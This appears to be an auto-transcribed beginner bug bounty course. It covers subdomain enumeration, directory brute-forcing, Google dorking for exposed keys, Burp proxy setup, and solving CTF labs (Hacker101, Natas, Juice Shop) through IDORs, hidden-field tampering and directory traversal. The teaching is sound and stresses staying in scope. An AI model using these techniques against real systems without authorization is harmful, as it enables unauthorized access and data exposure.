just a lot easier to move around I can actually use my mouse to click around inside of the text file so the way to install this is Type in sudo apt install just like this G edit you hit enter into your password and it will install for you and then the second thing I want you to install is sublister so if we type in a sub Lister like this not like that like this you can see that it doesn't do anything for me but if I type in sudo apt install and I hit enter type in your password it will go ahead and install sublister for me and now if I type in sublister like this it will turn blue and now be ready for me to use and we will install fuff I don't think it is already on the Cali box so we don't need to install any other tools those are the only two we need to install and we'll go ahead and start looking at how to use the most common tools for the world of a bug bounty hunting one of the most popular tools for finding subdomains and the way you use it is just type in sublister just like this and then you will type in the domain you want to pull down subdomains for so we'll type in www we need actually a Dash D in here so we type in dash D and I think we can actually just type in yahoo.com and hit enter and it will automatically go out and start searching for subdomains for us one of the important things to know is that when it pulls down subdomains for us not all of them are going to be in scope and you should definitely check to make sure they're in scope and some of them may not even be owned by your target so in this case we're looking at Yahoo and some of these might not even be owned by Yahoo so one of the things I like to do is if I was open up this URL right here and at the bottom I like to look to make sure that it says it is owned by Yahoo and so this is a sublister this is a great way to pull down subdomains there are other tools and other ways to use this but this is one of the most common and from here we can actually Brute Force other endpoints with Thoth and we'll go ahead and check that out so with thought this is one of my favorites is because when it Brute Forces it goes so quickly I actually like to slow it down or if I do run file if I always use a VPN just just in case my IP gets banned I can just change my VPN to another IP address and continue on but I usually do a slow down fluff so that way the server doesn't think I'm trying to Dos it so when you use thuff it would look something like this we can type in help and look at the usage we're shown right here you have to have a word list and then there's some other flags in here and the URL so what we would do is use fuff Dash w and then we can go I think we can type in user share word list what are my options derb slash small.txt we'll use this word list and then we would type in HTTPS www.yahoo.com and then we type in fuzz like this if we hit enter we need to have our Dash U right here and if we hit enter it'll automatically start brute forcing for us right here where we put fuzz to see if there are any extensions that we can find a few things to note we use the dash P right here for the delays and you can also use the filter options right here in order to filter out let's say we wanted to filter out by a response code or we wanted to match a response code we could get rid of these 302s right here or anything that has one line or let's say one word and we can just filter out with fuff that way so that way the output doesn't go quite so quickly so we can just come up here and we could say FL so we're going to filter out we need a flag Dash FL and we could filter out by the line right here and we can say anything with one line don't return it to us and now you can see it running and what is brought back has more than one line on it and there's other ways to filter these out and you can go ahead and play around with fuff it is one of my favorites the other one I like to use is derb because it's really simple you just would type in derb and then you type in the URL that you want to attack and then you just hit enter and it'll automatically start testing for you so those are my two favorites I like to use derb if I just need to do something quick and simple if I'm looking for Speed I will use thuff all right there is something called Google dorks or Google Dorking and I'm not really sure why it's called this so if you know you can leave a comment and let me know why it's called Google Dorking because that just seems like a really weird name to me maybe I could Google it and find out but the thing about Google is pretty much everything on the internet is stored inside of Google the search engine you just have to know how to look for it Google is constantly crawling the internet and storing new files new URLs and more information into their database you just have to know how to find it so let's say I was looking for a doctor named Charles Hodge what I could type in is just Charles and then type in Hodge we'll go go with Charles Charles Hodge right here this is what I was going to use and we hit enter this was Princeton Theological Seminary as president but this is not the let's say MD that we're looking for what you can do is just add quotations and put in MD and now everything that comes back will be medical doctors or you can put in literally anything you want into the these quotations and it will find it so an example of this is if we say we want hacker one it'll pull up hacker one and let's say we want the hacker one programs if we type this in it'll pull it up for us anyway but what we could do is add in the quotes just like this and say the programs and hit enter and now everything that comes back will have to have a programs inside of the search and so this is one of the ways to use the Google Docs you can also do this with GitHub as well when you are searching through the GitHub code you can type in the a specific word like let's say we're looking for hacker one and then we type in quotes and we want to look for an API it'll pull down what has an API and then you can come in here and you can look to see if they have an API that you can use so using quotes within Google will help you narrow down your search and what is brought back and as I mentioned this is something that you should do within GitHub as well when you're searching for let's say API keys or passwords or something of that nature and now we're going to move on to burp okay in this video we are going to be setting up our proxy burp and right now if we just hit enter on Google it loads just fine for us but when we set up our proxy we will this is going to not work and I'm going to show you how to set it up so we will come over to these three lines we'll go down to settings scroll all the way to the bottom click settings go manual proxy configuration we're going to go 127.0.0.1 because this is the default with port 8080 on Burp so if we say ok to this and we come over to Google now and we try and run it it's going to tell us the proxy server is refusing connection and we will need to open up burp and if this is the first time you've opened a burp there might be quite a few things you have to click through in order to actually get it to open but once you get it to open it will look something like this so if we come to proxy and options you'll see right here this is what we have set up and we're going to need to import these certificates so you'll click this top one next and we are going to go next we're going to open up file I guess we're going to select we're going to have to in in the file that we select we'll go to our desktop this is a great place to store it so we'll name the file cert.ca and we can save this it will save to our desktop we'll say great and now that this has saved we're going to need to add this into our security I've already added it in so I'm not going to add it in again but it'll look just the same you'll scroll down once you've gone three lines to settings we'll just show this again settings privacy and security scroll down that was too far scroll down to certificates I guess it's all the way at the bottom you click view certificates and then you're going to import and we're going to go to our desktop and we're going to say we want all files and then we're going to save the cert that we just opened you will click open and I have already installed it so we'll say Okay Okay And now when we come back over here to Google we'll need to turn our proxy Interceptor off we can test it to make sure it works and it does accidentally clicked one of the little tabs down here so if we say Google we are now running as we need to and if we need we can intercept a request just like that but we're not going to get into that just yet so that is how you set up burp and we will continue on okay we are going to be starting our URL portion of this course just what exactly we can learn from the URL what we can do in the URL which is actually quite a bit the URL is actually something that you can learn about how the website functions you can look sometimes you can see information personal information sensitive data can be stored there so for example if in this URL it had an ID of my name or my email address those are things that you wouldn't necessarily want in a URL or specifically if a password was in there those are things that you could actually report if you had sensitive data in there but we're basically going to be looking looking at how we can manipulate the URL to our advantage and what we can do specifically with pages so I remember when I first started down this path of wanting to learn web app pin testing sometimes you'll go to a capture the flag website and it will be just a blank page and I remember coming to the blank pages and thinking oh my goodness I have no idea what I'm supposed to do but for you we've already gone through the Recon portion of this course and you know to go to derb and just start looking for directories and then also we're going to be looking at the source code I mentioned it briefly earlier but it's something that can be really helpful and I'll show you why so I made this very very basic HTML website what I'm about to show you something that derb would probably find but if it doesn't you can kind of see how this is going to work you can come in here and you can just go page one and then you can go okay well if there's a page one is there a page two and then you hit enter oh page two is blank and then you go page three and then you hit enter and we hit a forbidden page and so if we have this forbidden page there's something on it that we're not supposed to be able to access well how can we get there this is when remembering looking at source code can be really helpful and so we can come over here and we can go view page source and you can look through and see just how basic this really is and you can see that we have something hidden and you can go there is this directory or this file for more information and so you can come here and you can copy this and you could paste it in up here another way to come across this is you can see that this is hit hidden we're going to cover this in more detail as we go through the course but as you go to this the source page one other thing that's really helpful to look through is to right click and just go inspect you can inspect what is on the page so basically the same thing that we saw was the source but you can see where this is hidden sometimes you will have login pages and there will be hidden fields that you can open up and try and manipulate and you can just actually type this into text and it'll actually show up on the page as plain text and so we have this file here if you remember we had page three was forbidden and we're not able to enter into it but we can try this HTML actually won't be on any websites I just didn't take the time to remove it and so we'll ignore it and act like it isn't there but if we remember from this right here we have this edit three which I'm guessing is our page three and then this would be this is the forbidden page where you can access files now we're actually going to go and practice something very similar to this and when you do this what you're going to need to do is go to Google I would encourage making a new Gmail account and then going and signing up on hacker one and then we're going to be using hacker 101 to practice what we just saw for us to be able to gain some practice it is a CTF okay we are going to set up our hacker One account you can actually come into Google and type in hacker 101 this is going to be their Capture the Flag practice area and you can actually click this and what will happen for you it actually I've already logged in but what will happen for you is it's going to say it'll bring you to a login page once you reach the login page you will have to go and create your own account with hacker one and once you create your account with hacker one you can navigate back to Google type in hacker 101 and then click on the hacker CTF and then it will bring you back to login you'll click the blue button and then you will log in and it will bring you to this page and if it doesn't bring you to this page page you have a navigation bar very similar to this one and you will just click on CTF and then you will be at this page but you're going to have to register in order to reach this page and then what I want you to do as we begin working with actual vulnerable websites is go ahead and click go this is going to be the very first challenge I have for you once it loads you're going to be brought to this page and the way hacker one has set up their training program is that you will have flags and it'll have a bunch of random numbers and once you reach that flag you will know you have found the area of the website that you were not supposed to find or is supposed to be vulnerable and so with that I want to have you pause this video and see if what you've learned in the last lesson you can figure out how to find the flag all on your own so with that pause the video and give that challenge a go okay if you got it that is great if not I'm going to go ahead and reveal to you how to find this specific flag before you do I would challenge you to go back and watch the previous video and just see the steps that I walk through and then go ahead and come back here and give it a try because I am certain with what we have covered you can find this flag on your own so the way we find this very first flag is by coming in here and just right clicking and then going to view page source and then we can look at the page source and we can see what is in here and it has a background image and then here it is background.png just a little bit ago actually came in here um to try this and I my guess was this is going to be a file that we were not supposed to be able to access and so copied this came over and paste it at the end of our URL we're going to paste it and then hit enter and then here is our flag we're going to move on into the next video and I'm going to help you get set up on what you're looking for and then I'm going to turn you loose and see if you can find the next flag on your own okay we are ready for Challenge number two we are going to come into the first easy program we can enter we're going to only find one of these four Flags we'll actually come back later we're going to go ahead and click go and pull open this Vernal vulnerable website and I'm going to Turn You Loose once this loads because everything that we have done so far that we've covered should give you everything you need to know to find the flag that we're looking for in this specific capture the flag and so with that I want you to go ahead and click around in the website and see if you can find the flag and so we can go ahead and pause the video now and see if you can solve the first challenge I believe we've covered most everything you need to know to find this flag and so the first thing that we would do is just start clicking around and you could maybe make a page and see what happens we've got a page here we're on page nine and so we can go back we can edit this page and we can see we can edit our page nine you can go back we can click on the markdown test and click the button it doesn't really do anything can come in and view the page source and we can look around there's not really a whole lot here for us and so we can go back and we can go to home we can go to testing and just as we continue to click around a couple of things that stand out to me in our URL is that we have this page so we can come into let's just go into the page that we created um we can come in here and just go page one page two page three uh not found well we know there has to be at least nine because we have created page nine so go to four five and then we hit the Forbidden page if you remember in the example that I showed earlier we have seen a forbidden page before and then we'll keep going we'll go all the way up to page nine and look at every single one every single option we have because we know that's how far we are as we've created so we have all these and then page nine should be the one we created so what page was that that was forbidden it was page five so how do we access this we can go view page source says we don't have permission and it is forbidden well there is another way to view this page if you remember from the example website that I made and showed earlier you would know that we can try and get around this because we have the option to edit this page and so if we edit this page and we know we can edit the page that we made maybe we can edit the page that was forbidden so we can come in here and put in five and there it is there's the flag so I hope you found this I think by now we've covered everything needed to find a flag like this in the URL I have a few more challenges for us to go ahead and try um they're going to be on a website called Over The Wire and I will actually help you navigate to that page and get logged in we don't actually have to make a user or create a user which is very nice and so it's very easy to access and to practice on and so with that I'll see you in the next video and we'll get that all set up okay we are ready for a few more challenges and so we're going to go ahead and head over to a website called Over The Wire and you can click on it or type it in and we're going to go ahead and click on notice this is where we're going to be working out of we can click on that and it will pull it open and this is where we're going to get started I'm going to go ahead and open a new tab to keep this one open so we're going to start on level 0 password is going to be level zero and so all we have to do is copy this URL and paste it in and then hit enter and our password is going to be notice 0 and notice zero and then we'll hit enter and every time you find a new flag you will come up here and you will change the 0 to a one the one to a two the two to a 3 and it will prompt you and say username and you so we have not a zero right now the next username will be not as one and then the flag that you find will actually be your password for the next level we have gone over everything needed to find this first flag and I want you to go ahead and try and do that now okay hopefully that went well for you and you were able to find the first flag but before we get into that and get going too far there's one thing I forgot to mention in the Recon portion of the course something that we will use and notice and you will use later on in your bug bounty hunting career is the robots.txt file so you can have the way we get to that is you just hit a forward slash and then you hit robot Dot txt and then you hit enter and it will take you to a page this one doesn't have one set up but it'll take you to a page that doesn't allow search engines to find and so sometimes websites will have files that they are hosting online that they don't want Google displaying and so they'll have a disallow or allow for Google and Bing and Yahoo and other search engines to go through and crawl their website and it will go through that robots.txt file and we'll say do not allow Google or Bing or Yahoo to crawl through these files and so it's always a good thing to check the robots.txt and roll through and see what's allowed and what's disallowed and then visit those disallowed files and see what's in there or those domains or directories that we find and so with that we'll go ahead and solve this Challenge and so I hope by now you know one of the first things we do is to go ahead and view the page Source or you can inspect the element either one works I like to view the page Source because it gives us a more complete View and so one thing I want to mention about the notice levels is everything inside this head tag which will be from here to here it doesn't have anything to do with the level and so sometimes you'll see the password for the previous level up here which the next one would be right here this is our password for this Challenge and so I hope you found this and next time if you view the page Source this password will be right here and just so you know it's inside the head tag and so it's not actually anything that's going to be relevant to us and so here's the password for the next level so you can go ahead and copy this and the way we get to the next level if you remember is come up here go to notice to change this to one it will prompt us for the username which is going to be notice one and then our password which we just found in that flag and we hit enter and that takes us to the next level and if you want to go ahead and try and solve this challenge you can do that now I'm going to stop this video and we will solve this challenge in the next lesson and so this one says that we are not allowed to right click it's been blocked however for me if I go ahead and I use my keyboard to right click if I hold down control and hit the right click or click then it works for me and so my right click is available through using control and then I do the exact same thing I go to view page source and then once in here you can look through our code and then they've got it commented out the password for notice 2 is and then here's our password now this may seem really easy but you will actually find people who have put in these comments in the code of a username or a password or an API key and has they just have forgotten to delete it so they'll put them in here while they're developing the site or while they're writing their code and they need to remember their username their passwords other sensitive information and you will actually come across it just being hard coded right onto the site and so that's why we check the code and sometimes you will find like a like you will really find something just like this a username and a password these seem very easy but they're also very practical and there's something you will come across pretty regularly alright this is an update since I originally made this video and was saying that developer will accidentally push usernames and passwords I was working on the back end of a web app and I accidentally pushed my database username and password to the public GitHub page so when I say this happens I mean it I have done it I'm sure almost every single developer at some point has pushed something sensitive to GitHub and it is something to watch out for so there is my update and so I want to I guess I shouldn't say pretty regularly you will come across them most people will have already reported these this is why it's important to be one of the first ones on a site to pick a specific Target and make sure you keep up to up to date what's coming out new on different domains and different subdomains as you continue to work through different programs and your bug bounty hunting so we'll go ahead and copy this password will come back to our main site we'll type in notice2 and we will type in notice 2. and paste our password I'm going to not save this and then here we are again it says there's nothing on this page that should give us a clue everything we need to know to solve this challenge we have already covered previously I think there's a little more to it that will cause us to need our critical thinking skills but we have covered everything needed to solve this Challenge and so I'm going to go ahead and give this a go and we'll go over the solution okay how did that go hopefully you were able to solve this challenge I'm actually going to show us a couple different ways that we could solve this challenge just so that we have a more rounded understanding of how the URL works and how different files and different directories are included into domains and so with that I think by now you probably know what we're going to do we're going to go ahead and right click we're going to view the page source and we see here's where it says there's no nothing on this page and so we can look through everything in the header doesn't matter isn't relevant to us and so all that's left is this image and then we have a link so what we can do is we can go ahead and copy this and we're going to paste it into our URL so as we paste this we can go ahead and hit enter and see where it takes it and when I first solve this I went and I checked to see if I could inspect the element to see if there was anything else on this page other than this picture or maybe there was something inside of it that would help us and when I was looking here at the URL I noticed that this is a file or an image and it's inside of a directory called files now if you remember we can actually go back directories and you can actually just delete the pixel.png and it will take you to the previous directory and here it is or we can go back and just another way to see this is you can do just like like we learned in our home folder or in our Kali Linux terminal you can put have your slash and you can go dot dot slash and you can hit enter and that will take us back one file or One Directory and so we've already viewed the pixel and now we've been in the Parent Directory but now we can see this users Dot txt and so we can click this and it'll take us into a new file and here's usernames and passwords and so you have Alice Bob Charlie and then here's nadis 3. so this would be our username and here is our password for the next challenge and so we've seen all of this before we have seen that we can find in our source code things that don't show up or hidden files or hidden images and so we've seen this before so I hope that you would have copied this and have pasted it and we've also seen What's called the directory traversal going back or deleting and moving into different files and different directories and so I hope that you were able to solve this Challenge and so we'll go ahead and get set up for the next challenge with different ways to install a wasp Juice Shop and you can watch the next five minutes of the video and see which one you think looks easier I personally think the try hack me a loss do shop right here is the easiest way but I'll show you how to download and install a awesome Juice Shop onto your local machine and you can decide which way looks easiest for you and you would like to run so I'm going to show both of those to you now now since I originally have made these videos a wasp Juice Shop has now been put on try hack me and it's really simple to just go to try hack me make an account with them and connect with their servers and then open up a Juice Shop box so you can either install it the way that I have already shown in the previous video or you can come to try hack me it is free to make an account and open up a lost Juice Shop and from there everything will be the same you will just click Start machine and it will open up a machine like this and then once this it gives you an IP address you can copy it to your clipboard and open up a new tab and paste in the IP address and it will open up juice shop for you and I'll let this load and I'm going to cut this and then I'll show you how to open it up and everything will look just the same the way you're going to connect to the box is come up to access machine you're going to click open in VPN can download right here and it will download your VPN for you you'll come over here you will CD into your downloads and then you will type in sudo openvpn and then whatever your VPN download name is and you'll hit enter enter in your password and it will connect you I'll go ahead and do this now okay I have connected to the VPN and now we can copy this and with our new tab paste this in and we will be brought to the to shop web app and we will accept the cookies num num and then we are ready to start so it's up to you which way you would like to install Juice Shop okay we are going to go ahead and install a vulnerable web app on our local machine it's a great place to practice it's put out by owas which is going to be a great resource for you rather than just seeing me show you how to do something or listen to me and tell you about it this is going to be a place that we actually go out and practice this and so we're going to download it by going to sourceforge.net and I'm going to have this linked for you in the resources and you can go ahead and click on that link and hopefully I can get it to a link directly to the downloads so you don't have to navigate through any of this and this is actually my second time trying to download it because the first time I downloaded uh the wrong version and I don't want that to happen to you and so hopefully that link will work for you but if not you can follow along and I'll show you how to get to the proper download so we type in juice and we click on Juice Shop it was the second one and the search engine we'll go ahead and click files we want 9.1.3 which is right here we're going to be installing node 12 and so we need to make sure that we get node 12 and it's on Linux which is way down here at the bottom this is where I went wrong last time so we have Juice Shop node 12 with Linux this isn't the right file that's not the file we want this one right here is one we want we want the tgz and so we'll go ahead and click that and after you click this it might take a little bit for the download to go ahead and take place and but you can go ahead and click it your download will short begin shortly and then once it downloads we'll go ahead and save it and it will automatically save to our downloads and so I'm going to go ahead and pause the video and I'll resume it once the download has popped up okay there's our download we're going to go ahead and click save file and this is going to save it to our downloads we can go ahead and click ok I'm going to go ahead and close out of sourceforge because we no longer need that then we're going to navigate over to our terminal I am in the home directory so I'm going to go ahead and CD into our downloads I will LS and then here's the file we just downloaded we need to unzip it so we're going to go ahead and type in tar and then we will go Dash x v z f and then Juice Shop yours isn't going to pop up like mine is because I already typed this in once and then I'll tab to autocomplete and this will go ahead and extract all of the the content for us and then once this is finished you will need to install node.js and then npm so we'll go ahead and type in sudo apt get install and first you'll go node js I already installed it so I'm not going to install it again but you'd hit enter and it'll say are you sure you want to you will put in y and then you'll hit enter and it will go ahead and finish the download for you it might take up to a minute because there's a lot of files especially in npm and so we'll go ahead and second you'll do sudo apt-get install npm you will hit enter you will enter your password for the first one you won't have to enter it for the second one and that will go ahead and run and install npm and then we're going to LS and our downloads and we're going to change directories into Juice Shop and so we'll CD into our Juice Shop folder and every time you run OAS Juice Shop and you want to open it up and you want to practice in this vulnerable web app you will have to CD into your downloads and CD into Juice Shop because when you spin up your server it is going to spin up whatever content is inside the directory that you're inside of and so now to start npm we just type in PM start and that will go ahead and spin up our server for us and it now says our server is listening on Port 3000 and then we can come back to our search engine and you can type this is what we'll be typing in this localhost 3000 and you'll type that into your browser and this is now our vulnerable web app that we are going to be practicing on in the future lessons but before we get to practicing and seeing what we can manipulate and what vulnerabilities we can find I want to walk us through a a little bit of what we're going to be looking for and how to identify different vulnerabilities and how we're going to use burps to help us find them but you will notice that if you have burp running and you turn your proxy on and you start clicking on things and you refresh the page burp is not intercepting anything it is not working for us so we need to configure our traffic so that it goes through our proxy and we're going to do that by going over here opening a new tab we will type in about config and hit enter and I will warn you to proceed with caution because this will change how your browser functions so you want to accept the rich risk and continue and we are going to type in Network the DOT proxy and this one right here allow hijacking localhost we'll click this and we need it to change to true and then we can go ahead and close out of this tab and now if we refresh our page you can see that our traffic is running through burp and we are able to intercept the requests okay in the next few videos we're going to be going through a couple different PowerPoints the reason for this is I think it's really helpful for us to have some kind of foundation before we begin looking at examples I think by the time we get through the PowerPoint you're going to be a little confused and probably still not know what exactly we're looking for what's going on but my hope is that with the Powerpoints and then just a couple of examples you'll be able to start finding some of these bugs on your own and we're going to be practicing on hacker 101 as well as Juice Shop which we just downloaded and we're going to be looking at how to use a burp before we begin looking at trying to exploit some of these vulnerabilities I think that you will be using burp a lot and so it'll be helpful to go through and kind of look at how it works and explore just a couple of its functionalities before we begin our exploitation of some of these vulnerabilities and so we're going to be looking at idors business logic errors and we are also going to be looking at manipulating user input and cookies and tokens as well as we continue in this course and so we're going to begin by looking at insecure direct object reference these are called idors that really doesn't tell us a whole lot but they're really simple to understand once we get going these idors are going to be just parameters that we can change that we can so that we can bypass specific functions on a web app with idors or business logic errors you can bypass payment options you can reverse payment options so that you're the one getting paid you can put things into other people's carts uh there's a lot of different ways you can use eye doors and when you're out hunting on your own you're going to have to be creative because there are many different ways that you can exploit eye doors you can skip login Pages you can access someone else's account I personally one of the first bugs I ever found was being able to write on someone else's social media platforms it was actually just one platform and there was just one specific area of the web app where I was able to change an ID and write on someone else's wall of their new news feed and so that is an example of an idor you can also leave feedback on someone else under someone else's name you can edit another person's blog or their post and so these are just examples of idors and different ways that you are going to be able to find them and idors are probably idors and business logic errors are going to be the most common bugs out there which is a great thing because it makes it easier for us to find them and they are easy to find as well and so these are something I think we should learn very well and we are going to have a significant amount of time to practice these because there's actually a lot of different areas and ways to practice these especially in Juice Shop which we just downloaded the best way to test for these and I think the only way is by creating two different accounts it is always good to create two different accounts because you will have to test in real life against your own accounts you cannot test on someone else's account so you can't write actually on someone else's wall this would be out of scope or you can't leave feedback as a different user these will always be out of scope you don't want to ever mess with the functionality of the application or the people who use it you will only use your own accounts to test against and it also makes it easier to use your own account because you already have a second ID number that you can use on your attacker account so you'll have an attacker account and a victim account that you will use and so you don't want to test on someone else's account an example or a simple example to remember is to look for hidden inputs you will actually see this as well in burp when you create an account it won't say input type hidden but you will see such as a name and your username and it will say are you an admin and then it'll say value no an easy way to show one of these errors just to change this value to yes or true and you will automatically have admin privileges and we're actually going to be able to test this out in Juice Shop something just like this so you'll get to see this in action and so we're always looking for parameters and things that we can change to get us somewhere that we should not be one of the other places that you will find idors is in cookies a lot of times cookies and tokens will host user information so that's how websites will keep you authenticated not all of them but some of them will be through cookies and so you will have inside cookies maybe you'll see something in your cookie like user ID and then a number and you can change the number to something else to see if you can access that account for example if you had two accounts you'd take the user ID of your victim account and you would replace it on your attacker account and see if you can access parts of that application that you shouldn't under another user if you were getting malicious with this you would change the value to 0 or 1 and see if you could gain admin privileges to the web app and another way to test for this is to see if you can log in save your cookies first or your tokens and then log out and then see if you can log in and delete your previous cookies or tokens and then repaste in your new ones and see if they have been terminated or ended if they haven't this would be a logic error because when the session has ended so should the cookies or tokens and so you can see what to manipulate and where you can manipulate different things within cookies and tokens as well these aren't specifically idors but they're similar they're similar enough that I think they can be included together and so when we're testing we're going to be using burp this is going to be where we're at the most sometimes you will be able to see these in a URL for example if we have this example here www.website.com and let's say you have an invoice you just purchase something and it says your invoice number is 12. in a URL you can just change this 12 to an 11 and see if you can access another cup of customers invoice and if you could this would be a sensitive information disclosure it's something you shouldn't be able to access and that would be a simple idore I think they're easier to test for in burp because it's all laid out for us as we'll see in the coming videos and so also another example would be you can upload images or resumes um like on indeed you can upload a resume and you can see in the URL if you pull your resume so let's pretend this is indeed and it says www.indy.com and then it's got a slash and it says resume equals 87 and that's your resume you could change this and see if you could access someone else's image or resume just like you would have with the invoice and see what you can access but remember out in the wild we are testing our own accounts and so I actually have an example here for us I put pulled off of hacker one of an eye door that somebody actually has found and so we'll walk through exactly how he pulled this off and so you went to he goes to the website remember creating two accounts he has a victim logs and is the victim he creates a Blog on the site he saves it and then what he ends up doing is going into the victim account or the attacker account and he does the same thing makes the blog and then from there he clicks the save button and then goes to the edit user profile and saves it opens up burp and then what happens is he can change the the ID with the victim's ID and this is this would be a clear eye door accessing something that you shouldn't be able to and we've seen things similar to this with the URLs earlier in changing URLs and then he forwards the request to go to the victims account and the website information and you can see that it has changed and so this is an example of an idor I think we'll be able to make this sound a whole lot easier once we're actually walking through them and so I want to go and talk a little bit more about cookies and the URL and what exactly we can do with them then we're going to look at how to use burp defined eye doors and then I want to turn you loose and let you try and find an eye door on your own in this video we're going to talk a little more about URLs and what we can do with them cookies and tokens and then we're going to look at something called cyber chef and then we'll move into burp and exactly how it is going to help us in its functionality but before we get there I was talking with my wife and I just said hey I think I'm going to have to warn that my power points are going to be full of Errors because I actually made them just for bullet points for myself and I was going to keep them on my second Monitor and then I realized I didn't have anything to show you and I wasn't just going to have a blank screen so if you're wondering how can somebody with a PhD have such poor quality power points they were originally just my notes and so I decided rather than sit here and comb through them and go back over it I will just show you this is basically what my notes look like when I take notes and walk you through walk you through them just so we can have a better understanding of a few more exploits before we move into Bert so first changing passwords you will actually come across this in Juice Shop when we are practicing and more as we get further into the course sometimes you will see a URL that looks similar to this or in burp it will pop up at the bottom of a post request and we will have something similar to this like a change password you will have the username and then the new password will be stored right here and and in something like this you could actually grab someone else's username and on your victim account try and change the password to it and see if you're able to pull that off or you can go ahead and see if you can maybe delete your victim account by instead of having change password you'd have delete account or delete user or just delete and then you can put the username here and you would obviously not have the password you also invert be able to have delete instead of you'll have put post delete options and you can try and delete the account through Bert and if you are unable to even if you aren't able to pull any of that off if you have a URL that has a username and a password in it even if it is encoded with something as simple as base64 this would be an information disclosure and we'll get to why this would be an information disclosure in just a few slides we talked about this a little bit in the last one the last PowerPoint in the last video If you have a website something similar to this which actually just copied this out of the oasp guide and the Olas pen testing guide as well as another image that we're going to come to here in a second sometimes you'll come to something like this if you are logged out and you copy and paste in a URL that requires you to be authenticated and it says authenticated no and it does not allow you to view the site you can just change this authentication here to yes or true and see if you are able to access the site and see what you can gain access to and then we can check the log out functionality and this is why it is an information information disclosure if you have a username and a password in the URL because it is possible for you to log out on your computer and then close the browser and you'll be able to open up the browser and it has a cache the previous page that you were in and you can go back into the history and open that page and if it opens even if you're not able to go to any other links because you're not authenticated anymore but if it opens that URL and your username and password is in there it would be an information disclosure or if you log out and you don't close the browser it's possible to hit the back arrow or the back button and go to the previous page and have the information there and this can also be more than just information disclosure if you're able to hit the back button after you've logged out and then browse the site again and it re-authenticate you this is something that's listed in the oauth guide it's something that happens it's not very common but it's something to check for and you might be thinking this isn't a very big deal because that's what I originally thought I was okay we are going to in this video go go through some of the functionality of burp and so I'm going to go ahead and have you navigate over to hacker 101 and get into their CTF and we're going to open up post book and you can go ahead and click go and pull it open and when you're there the first page you'll come to will look like this and so we'll go ahead and come over on Burp you can turn your intercept on and make sure that you are sending all of your traffic through your proxy by coming over here we'll go to preferences scroll down to setting and make sure that you have manual proxy configuration and then it looks like this and once you have that done you can click ok and your proxy should now be set up to intercept your traffic and just to give it a test you can refresh the page and make sure that it pulls through here and you can forward all of the requests we intercept or you can just turn it back off and then turn it back on but we are going to come in here and we are going to sign up and so we'll go ahead and click sign up and you can just see what's going on in here where have our sign up dot PHP you can see it's pulling that from our URL we have a get request we'll forward that and we'll come back over here and this is where you're going to make your username and we can just type in test and password can be test and you can submit your query and then in here you can see your username and your password and if you wanted to actually try and mess with this and see what we can do with it we would send it to repeater so you just right click and click Send to repeater and over here we can send this request as many times as we would like to and so in here we can go we can change the username and click test1 and then send it and we are getting a 302 in response so let's go ahead and shut this off and see we have successfully signed up and I think we actually created the test one account as well yep so we have made the test account and the test one account and while you're in repeater over here you can see that this would be not a very secure way of submitting these things you will actually come across this pretty regularly even on large very common websites and you can see what what you can do here you can try and manipulate things and see just what you can do and maybe type A get request and change to a different URL and see what response you get over here there's lots of things you can do and in repeater you can send this as many times as you want to the server and really just trying to figure out if you can get anywhere that you shouldn't be with this and so we're going to go ahead and come back to our proxy turn it on now we are going to just create a post we'll go hello world create post we have a user ID of five and remember every time we see ID we should be thinking idore what can we change where can we go what can we get with this and we have the body of the message over here we have a cookie over here you could bring this over to cyber chef and see if maybe there's anything in there if you remember we just go magic and then we would paste it in and you can see we didn't get anything out of our cookie and so that's okay we would come back here we can send this to it says we get a redirect you can follow the redirect and then come down here and see what your response is and it says we need to sign in so you have to be authenticated so the cookie is necessary something that we have to have in order to continue on for authentication purposes but as you can see this is kind of how I would just go about testing at the beginning just see what I can do with this ID what I can do with verb with body see where I can get where I can go see what responses come back and with that I think I've given you a pretty good clue here with this user ID there is an idore in post book I'm going to give you the challenge now to open up burp come in make an account or two accounts and see if you can find the idoor before we go ahead and solve this challenge I want to introduce you into one more functionality inside burp that is going to be helpful in the future as you're doing bug bounty hunt hunting and that is the Intruder or so right here an intruder one of the things we could do with Intruder is as we come in here and we just refresh this page we have this ID of six let's say there are thousand different numbers in here what you can do is send this to Intruder and it will actually go through these numbers for us so you can come over here and you can go to position and we will clear this and you'll highlight this number six and what it does is it will go through every number we specify in here and replace that number six and then give us back the response so we can come over to our payload and we can go simple we can do a simple list and then we will put in just numbers we'll do one through ten so you just go one two three four five six seven eight nine 10. and now we have just a simple list and we have just the one position and we're going to go ahead and run through these numbers and so what you do is you click Start attack and go ok and it will automatically replace that for us and then we can click on these and see what we have in the response and you can come through and see if we have found anything in here says write a new post my profile it doesn't look like anything private this is for my own eyes only number two and we have we see the same thing and this one actually has someone put in actual content and then you can go down to number three and you can see how this would make it easier so you don't actually have to go through and do one two three four manually you can but you don't have to and so what we would do if we wanted to get more malicious with this as we're looking for an eye door we can come back into our proxy here and you can turn it off or you can use burp I'm going to use the URL just because it's what we're used to but I would encourage you to actually try this with burp I'm going to show you how I would do it with the URL and then you can actually come in here and see if you can run this exploit and find the flag with burp and without using the URL and so what we do is the exact same thing you can come in here and you can just go one and then somebody posted this it's not private it's to the public and you can come here and you can type in two and this actually has the check box yes this is my own eyes only and so this would be something that is not supposed to be seen by everyone and so this would be considered an eye door if this was an actual program you could report this as an idore and not only that you can write inside someone else's entry here and then you can save the post and in Saving the post I am not actually sure why there are two flags maybe one for writing on someone else's wall and one for the idor I'm actually not entirely sure but you can see the author was also an admin so we made it Beyond just a regular user and into an admin and so this is how idors work we're going to be moving from postbook into Juice Shop and the way I want to work through the Juice Shop vulnerabilities is by giving you just little hints maybe telling you where what part of the application there is a vulnerability and then setting you free and after you have spent a significant amount of time and you're starting to get frustrated or you want a clue just continue watching the video and I'm going to work through some of these vulnerabilities step by step but I want you to give it a shot and try and figure out where the vulnerability is and see if you can solve the challenges on your own and only if you're really struggling come back and get another clue and then pause the video again and see if you can figure out the rest of the challenge on your own kind of like we have been doing but from this point on it's going to be a lot more difficult for me to show you very specific vulnerabilities on multiple websites because at this point Juice Shop is going to be our main place of working because there's not a whole lot of options when it comes to practicing specific vulnerabilities and then me showing them to you so I want to give you clues of where they might be located in the application and then set you free to try and exploit them and then only when necessary help you another clue 2. and so with that you can actually continue playing around in post book and see just what else you can do in finding idors okay we are ready to find our first eye door on our vulnerable web application so you can come in here and try and find it on your own or I can give you a tip on how to get started if you want to try it completely on your own you can go ahead and pause the video now browse the application intercept your traffic with burp and see if you can find the idor your first tip is going to be will find the eye door in leaving customer feedback under someone else's user so you can go ahead and try and find that now if you want or keep playing the video for the next tip okay the next tip is going to be creating an account you will I already created one I figured you didn't want to sit through me create 